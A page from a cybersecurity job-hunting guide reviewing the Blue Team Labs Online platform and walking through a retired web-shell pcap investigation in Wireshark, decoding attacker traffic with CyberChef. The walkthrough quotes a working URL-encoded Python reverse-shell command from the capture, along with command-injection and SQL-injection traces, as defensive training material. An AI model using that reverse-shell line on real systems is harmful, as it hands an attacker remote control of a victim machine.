CYBERSECURITY JOB HUNTING GUIDE
  • Home
  • Introduction
    • Things you should know
    • The strategy
  • Paths into Cybersecurity
    • First steps
    • SWOT Analysis
    • How much time do you need?
    • Calculate& Evaluate Knowledge
    • Imposter syndrome
    • Time Management
    • Cybersecurity Domains
    • Cloud Security
    • Financial advice >
      • Credit score
    • The salary
    • Advocacy for underrepresented groups
  • Goal Setting & Career paths
    • Find your career in 5 steps
    • Cybersecurity career options
    • Career finding with LinkedIn
    • Transferable Skills (general)
    • Transferable IT Skills
    • Find a path with job descriptions
    • The I do not know path
    • Do you know “garbage” jobs?
    • “Bonus” knowledge
    • Learning & Motivation
    • Particular vs. any job
    • Pentester path (start)
    • Pen Testing as Career
    • SOC Analyst as career
    • Security Engineer as career
    • Compliance & Risk as career
    • How to find a career (IAM Engineer)
    • Find a company
  • Networking
    • Networking like a pro
    • LinkedIn
    • Referrals & Skills
    • LinkedIn Recruiters >
      • Working with a recruiter
    • Cyber Community
    • Networking University
    • Mentoring
    • Build your personal brand
    • Goal of Networking
  • Hands-on
    • The home lab >
      • Designing a home lab
      • Ways to create a home lab
      • Hypervisors >
        • VirtualBox
        • VMWare Player
        • QEMU/KVM
      • Docker
      • Operating Systems >
        • Kali Linux >
          • Installing Kali with VirtualBox
        • Parrot
        • BlackArch
        • Red Hat Enterprise Linux >
          • RHCSA
        • Security Onion >
          • Installation Security Onion
        • Metasploitable2
        • Ubuntu
        • Windows >
          • Windows in a VM
          • Windows with Virtual Machine Manager
          • Preparing Windows logging
          • John Strand's ADHD VM
      • Firewalls >
        • pfSense Installation
        • pfSense configuration for Security Onion
    • Volunteer Work
    • Note Taking
    • Red labs >
      • Cyberseclabs
      • HackTheBox >
        • HackTheBox Academy
      • INE red side
      • RangeForce
      • Offensive Security
      • TryHackMe
      • Virtual Hacking Labs
    • Red tools & techniques >
      • Atomic Red Team
      • DVWA
      • Metasploit
      • OSINT tools
      • OWASP Juice Shop
    • Blue labs >
      • Blue Team Labs Online
      • DetectionLab (free)
      • INE
      • Letsdefend >
        • LetsDefend password stealer
      • Opensecuritytraining (free)
      • PurpleLabs
      • RangeForce
    • Blue tools >
      • Install a Canary Token
      • CyberChef
      • EDR Lima Charlie installation
      • EDR LimaCharlie configuration
      • EDR Velociraptor (free)
      • EDR Bluespawn (free)
      • DeepBlueCLI (logs Powershell, free)
      • Raccine (ransomware protection, free)
      • Install RITA (detects C2 traffic, free)
      • Sandboxes >
        • Joe's Sandbox
      • SIEM ELK Stack
      • SIEM Graylog >
        • Getting started with Graylog
        • Install Graylog
        • Graylog Windows agent
        • Graylog Linux agent
        • Graylog as application
      • Suricata with RangeForce
      • Identifying IoCs with RangeForce
      • What2Log
  • Certifications, Degree & Courses
    • Overview
    • Free & Affordable Resources
    • Pick your cert
    • Skill Assessment
    • Get a cheap degree
  • (Employment) fraud & scams
    • Suspicious Offer
    • Second Offer
    • Certification Scams
    • Fraud with courses
  • Analyzing a job ad
    • The Header
    • Building a Bridge
    • The Responsibilities
    • Desired Skills
    • Preferred Qualification
    • Benefits
    • Own skills vs job ad
    • Dealing with poorly written job ads
  • Resume writing
    • Templates
    • Building a draft
    • Resume in Detail
    • Understand the company
    • ATS and tailoring
    • Last Step
  • Cover letter
    • Writing a cover letter
  • Preparation & Interview
    • Organize your job hunt
    • SWOT Again (interview)
    • Twitter
    • The interview
    • Interview Questions Designed To Trick You
    • Post interview tasks
  • I did it all, but...
    • You are not alone
    • Try Something New
    • Why You'll Fail in Cyber Security
  • Yes, I got a job!
    • Two, or more offers?
    • Continued learning
    • Moving up
    • Lessons learned
  • Conclusion
  • Additional things
    • Reviews (labs, courses, certs) >
      • CompTIA A+
      • CompTIA Network+
      • CompTIA Security+
      • CompTIA Server+
      • CompTIA PenTest+
      • DroneSec DSOC
      • Defensive-Security Purple Labs
      • FAA Part 107
      • INE eCPPT & PTP
      • Letsdefend review
      • Microsoft AZ-500
      • RangeForce SOC 1
      • RangeForce SOC 2
    • Work In A Different Country >
      • The Work Permit
      • Working in the US
      • Studying in the US
      • Studying in Germany
      • Work in a different country
    • Other Resources >
      • Useful Links >
        • All about careers
        • Red resources
        • Blue resources
      • YouTube
      • Twitch
      • Podcasts
      • Books
      • Udemy
      • Thanks
    • Contributors
  • Stefan Waldvogel, where can I help?
  • Home
  • Introduction
    • Things you should know
    • The strategy
  • Paths into Cybersecurity
    • First steps
    • SWOT Analysis
    • How much time do you need?
    • Calculate& Evaluate Knowledge
    • Imposter syndrome
    • Time Management
    • Cybersecurity Domains
    • Cloud Security
    • Financial advice >
      • Credit score
    • The salary
    • Advocacy for underrepresented groups
  • Goal Setting & Career paths
    • Find your career in 5 steps
    • Cybersecurity career options
    • Career finding with LinkedIn
    • Transferable Skills (general)
    • Transferable IT Skills
    • Find a path with job descriptions
    • The I do not know path
    • Do you know “garbage” jobs?
    • “Bonus” knowledge
    • Learning & Motivation
    • Particular vs. any job
    • Pentester path (start)
    • Pen Testing as Career
    • SOC Analyst as career
    • Security Engineer as career
    • Compliance & Risk as career
    • How to find a career (IAM Engineer)
    • Find a company
  • Networking
    • Networking like a pro
    • LinkedIn
    • Referrals & Skills
    • LinkedIn Recruiters >
      • Working with a recruiter
    • Cyber Community
    • Networking University
    • Mentoring
    • Build your personal brand
    • Goal of Networking
  • Hands-on
    • The home lab >
      • Designing a home lab
      • Ways to create a home lab
      • Hypervisors >
        • VirtualBox
        • VMWare Player
        • QEMU/KVM
      • Docker
      • Operating Systems >
        • Kali Linux >
          • Installing Kali with VirtualBox
        • Parrot
        • BlackArch
        • Red Hat Enterprise Linux >
          • RHCSA
        • Security Onion >
          • Installation Security Onion
        • Metasploitable2
        • Ubuntu
        • Windows >
          • Windows in a VM
          • Windows with Virtual Machine Manager
          • Preparing Windows logging
          • John Strand's ADHD VM
      • Firewalls >
        • pfSense Installation
        • pfSense configuration for Security Onion
    • Volunteer Work
    • Note Taking
    • Red labs >
      • Cyberseclabs
      • HackTheBox >
        • HackTheBox Academy
      • INE red side
      • RangeForce
      • Offensive Security
      • TryHackMe
      • Virtual Hacking Labs
    • Red tools & techniques >
      • Atomic Red Team
      • DVWA
      • Metasploit
      • OSINT tools
      • OWASP Juice Shop
    • Blue labs >
      • Blue Team Labs Online
      • DetectionLab (free)
      • INE
      • Letsdefend >
        • LetsDefend password stealer
      • Opensecuritytraining (free)
      • PurpleLabs
      • RangeForce
    • Blue tools >
      • Install a Canary Token
      • CyberChef
      • EDR Lima Charlie installation
      • EDR LimaCharlie configuration
      • EDR Velociraptor (free)
      • EDR Bluespawn (free)
      • DeepBlueCLI (logs Powershell, free)
      • Raccine (ransomware protection, free)
      • Install RITA (detects C2 traffic, free)
      • Sandboxes >
        • Joe's Sandbox
      • SIEM ELK Stack
      • SIEM Graylog >
        • Getting started with Graylog
        • Install Graylog
        • Graylog Windows agent
        • Graylog Linux agent
        • Graylog as application
      • Suricata with RangeForce
      • Identifying IoCs with RangeForce
      • What2Log
  • Certifications, Degree & Courses
    • Overview
    • Free & Affordable Resources
    • Pick your cert
    • Skill Assessment
    • Get a cheap degree
  • (Employment) fraud & scams
    • Suspicious Offer
    • Second Offer
    • Certification Scams
    • Fraud with courses
  • Analyzing a job ad
    • The Header
    • Building a Bridge
    • The Responsibilities
    • Desired Skills
    • Preferred Qualification
    • Benefits
    • Own skills vs job ad
    • Dealing with poorly written job ads
  • Resume writing
    • Templates
    • Building a draft
    • Resume in Detail
    • Understand the company
    • ATS and tailoring
    • Last Step
  • Cover letter
    • Writing a cover letter
  • Preparation & Interview
    • Organize your job hunt
    • SWOT Again (interview)
    • Twitter
    • The interview
    • Interview Questions Designed To Trick You
    • Post interview tasks
  • I did it all, but...
    • You are not alone
    • Try Something New
    • Why You'll Fail in Cyber Security
  • Yes, I got a job!
    • Two, or more offers?
    • Continued learning
    • Moving up
    • Lessons learned
  • Conclusion
  • Additional things
    • Reviews (labs, courses, certs) >
      • CompTIA A+
      • CompTIA Network+
      • CompTIA Security+
      • CompTIA Server+
      • CompTIA PenTest+
      • DroneSec DSOC
      • Defensive-Security Purple Labs
      • FAA Part 107
      • INE eCPPT & PTP
      • Letsdefend review
      • Microsoft AZ-500
      • RangeForce SOC 1
      • RangeForce SOC 2
    • Work In A Different Country >
      • The Work Permit
      • Working in the US
      • Studying in the US
      • Studying in Germany
      • Work in a different country
    • Other Resources >
      • Useful Links >
        • All about careers
        • Red resources
        • Blue resources
      • YouTube
      • Twitch
      • Podcasts
      • Books
      • Udemy
      • Thanks
    • Contributors
  • Stefan Waldvogel, where can I help?
  CYBERSECURITY JOB HUNTING GUIDE

BLUE TEAM LABS ONLINE

Author: Stefan Waldvogel

BTLO is a new blue training platform

Overview:
Blue Team Labs Online (BTLO) is a training platform for blue knowledge. You learn how to defend a company, and you get valuable skills. The platform has two areas: Challenges and investigations. You can start with the free challenges, and right now (May 2021), you have about 20 of them.
You have 2 free investigations and 30 in the pro version.
If you start your career, try the free versions and if you like it, do the paid content.

HR relevant: 
no

Advantages: 
One of the most significant advantages is the price. Many modules are free; therefore, you can sharpen your skills and get job-ready. Labs like BTLO offer hands-on knowledge and are based on actual incidents.
The website has a point system, and it motivates you to learn more.
Retired systems allow write-ups. Therefore you can learn very efficiently.

Disadvantages:
Very hard to find; maybe HR and companies do not know this new form of hands-on learning.

Pricing:
​free, $30 a month for the pro labs

Recertification costs: 
-none-

Website:
blueteamlabs.online/
Picture
Small introduction
Do you want to know more about the style and quality? I will show you some details about the "Network Analysis -Web Shell" challenge. This module is retired, and write-ups are fine.

Hint: You find write-ups on the official website. I do not follow the questions it is more about what you do if you get a pcap file.

You find "Network Analysis - Web Shell" under Challenges:
Picture
If you start the challenge, you get an excellent overview with a lot of information. You learn more about your goals, the situation, and the questions.
Picture
What is nice:
You can use any tool you like. This is a realistic scenario, and if you do not know any tools, you get three options:
  • Wireshark
  • TCPDump
  • TShark
Let us talk about these options first. Wireshark is great for beginners and has a GUI, TShark is more or less Wireshark without a GUI and very fast. TCPDump is a separate program and command-line based.
Download the file and load it into Wireshark. You get a warning "This is real malware" -> always use a VM for your training.
If you use Ubuntu, Wireshark is not installed, install it with:
sudo apt update
sudo apt upgrade
sudo apt install wireshark

If you get an error with sudo not installed, switch the user with
sudo su
-> this is usually not recommended, but in a VM, it is okay.
Start Wireshark in a terminal with the command
wireshark
You see something like this:
Picture
If you use Wireshark the first time, try to understand the big picture. You see some network cards, and you can listen to the traffic.
Other options are available. One example: You can use Wireshark remote, and with SSH you log into a different system and collect the data.
Wireshark is mighty tool. This lab is a beginner lab; we use essential functions.

Import the pcap file
You can import the pcap under File -> Open. Here you have to pick the path. It should be under /home/{your user name}/Downloads
Picture
If you open it, you see more information and about 17,000 rows. This is massive, you cannot real all rows and we need filters to find the wanted data.

Wireshark has build in tools to analyze the traffic so we can see the statistics.
​
The starting point
Scroll through the traffic and you notice HTTP traffic. This is great, because HTTP is un-encrypted. We can read the files, the traffic and if we can read it, Wireshark can read it, too. Let us look at line 14:
Picture
This is a HTTP GET request. The machine with the IP 172.20.10.5 is asking a webserver on 172.20.10.2.
Something like this happens any time. These are two internal machines (class c network) and they talk to each other.
-> It is HTTP traffic, most likely many packets are connected. We can use Wireshark to see all related packets.
Right click on line 14 -> Follow -> HTTP Stream

​Can you see something special? Do you understand the big picture?
Picture
If you never saw such an output, there are lot of lines and it is overwhelming. What can we see:
We have two different colors (blue and red). One machine is blue and the second is red.
If you scroll around, you see input labels with password and username. This is important. A HTTP GET request transmits usernames and passwords un-encrypted. 
Here it is a login field for a "Register Complaint" website.

If read the data, you might understand the idea. Someone used a blank username and password and wanted to download something and it failed. We got a 404 error message and a "unable to find users" message.

Is this malicious? Maybe, maybe not. We got a very specific message: "unable to find user" and with this message an attacker can enumerate users. Assume we have a correct user but the wrong password, it might say: "wrong password".
This is only one request, it could be someone just forgot the username.

If you do such labs, try to understand the bigger picture, especially if you never saw all the data. Most malicious traffic hides behind a ton of legit traffic.

Different approach with files
Wireshark is smart and detects documents and files. Go to File -> Export Objects -> HTTP
Picture
Now, you see much more details. Scroll through the list and think. What looks suspicious and what is going on?
Download all the files to a folder and look around. Can you see something suspicious?
What about this:
Picture
First row
The command whoami is a Linux command and most hackers use the command "whoami" to see the own level. 
The answer could be wwwdata or maybe root.
The program is: dbfunctions.php
Someone can use dbfunctions.php to inject commands to the webserver. This is called "Command Injection" and a main problem. Use google if you want to learn more about this.
-> If you take certs like PenTest+ you need to know this.
One question is: Why is this program on this server? Is the function wanted or malicious? Such a feature is most likely not wanted.

Fifth row
This is a very long file name and word UNION is visible. This attack is called "Union Sql Injection." Many websites had this vulnerability. 
Do you want to know more about such attacks? You find free training here: tryhackme.com/room/owaspjuiceshop
Again, if you take certs, you need to understand these attacks (and how to mitigate them).

We found two weird things.
We can sort the file and look for bigger files. In one of them, we see details about the dbfunctions.php file.
Picture
This is .php allows an attacker to in inject commands.

How does it work?
An attacker finds a way to upload data to the server and uploads a new website, here dbfunctions.php. Now, the attacker can browse to this new website and can inject commands. This works, because user for this website is most likely wwwdata and executes the command on behalf of the attacker. If the wwwdata user has root rights, the attacker has full control about the machine.

If you go back to the questions for the challenge, you see some questions about this. If you do such labs, do more than just collect the points. Try to understand why things work and read or ask other students. Cybersecurity is about teamwork and networking.
Now, you should be able to answer the last questions. Sort the HTTP object list by Packet and you get: 
​ What is the first command executed by the attacker? (1 points) 
One question is tricky: "What is the name of the php file through which the attacker uploaded a web shell? (1 points)"

We saw the attacker used upload.php but this is not the wanted answer. BTLO wants the original website name.
We can use the find function under Edit.
Edit -> Find Packet 
Now you get a new line and you have to select "String" and add the wanted word, here "upload.php"

Picture
The list is still huge, and we can add a second filter.
Files are uploaded with POST requests, and we can use the filter function.
http.request.method==POST
The list is a bit smaller; we have only two POST requests with /upload.php. In both files is the wanted answer in the "Referer" field. There are multiple ways to extract the data. I used "follow TCP stream" (right-click on one of these two files -> follow) to get the bigger picture.​
Picture
Try to find the easy answers alone.
The next more challenging question is: What type of shell is used?

Build a filter:
We know the attacker used dbfunctions.php to send commands. 
The attacker IP is: 10.251.96.4 --> the filter is: ip.src==10.251.96.4
If we look closely, we see the commands are submitted via a GET request --> the filter is: http.request.method==GET

The && connects both commands:
ip.src==10.251.96.4 && http.request.method==GET
Picture
One of these entries is very suspicious and contains a python script. Follow the data stream and try to understand the output.
Picture
It looks like this:
cmd=python%20c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.251.96.4%22,4422));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

It is not really readable, but we can use cyberchef to convert the string. The link is:
gchq.github.io/CyberChef/
Cyberchef is a very powerful tool and can do much more, but we want to use "URL Decode." Find the recipe and use drag and drop. Copy the string and it should look like this:
Picture
It looks much better. This kind of shell talks back to the attackers machine and is called reverse shell. 
Try to find the other answer (port).
Bonus: One file has a base64 encoded thing it it. Find it, decode it and what is it.

Finish the other answers
One question is about tools. Most tools use the user_agent field to say "it is me" and therefore we can search for it. The search command could look like this:
ip.dst == 10.251.96.5 && http.user_agent
Picture
You can find one matching agent in many requests. The wanted tool does one thing: It searches for valid websites. Some are hidden, but the program tries hundreds.

We touched the second tool a while ago. Remember the UNION thing? That has something to do with SQL injections and hackers use automated tools.

We can open the Export HTTP object list again (File -> Export Objects -> HTTP) and if we click on the file with the UNION in it, Wireshark will jump to the file.
Picture
Can you find both names and the version number?

What is with the port range?
Wireshark has a tool and you can answer this question right away. The tool is under Statistics -> Conversations -> TCP.
Just sort for the ports and you get it.

What type is it?
Select one scan and look for the right key words. One port scanner is nmap and the standard scan is a SYN scan. It could look like this nmap -p 1-1000 10.251.96.5
Picture
Conclusion
I didn't follow the question on purpose because in the real world, you do not have questions. You see one interesting thing and you start your investigation.
Here, I highlighted the second part.
-> If you do a lab, you can follow the questions, but often you can find much more things. Do not limit your creativity because questions are a help, nothing more.

Bonus section
This is the bonus part and we play with RITA to find hidden stuff.

​zeek -C -r BTLOPortScan.pcap
sudo rita import /home/stefanr/Downloads/BTLOlab* BTLO1
sudo rita html-report BTLO1 
--> nothing interesting, it was just a try. 

nano /etc/rita/config.yaml
Next: DetectionLab (free)
© 2021. This work is licensed under a CC BY-SA 4.0 license​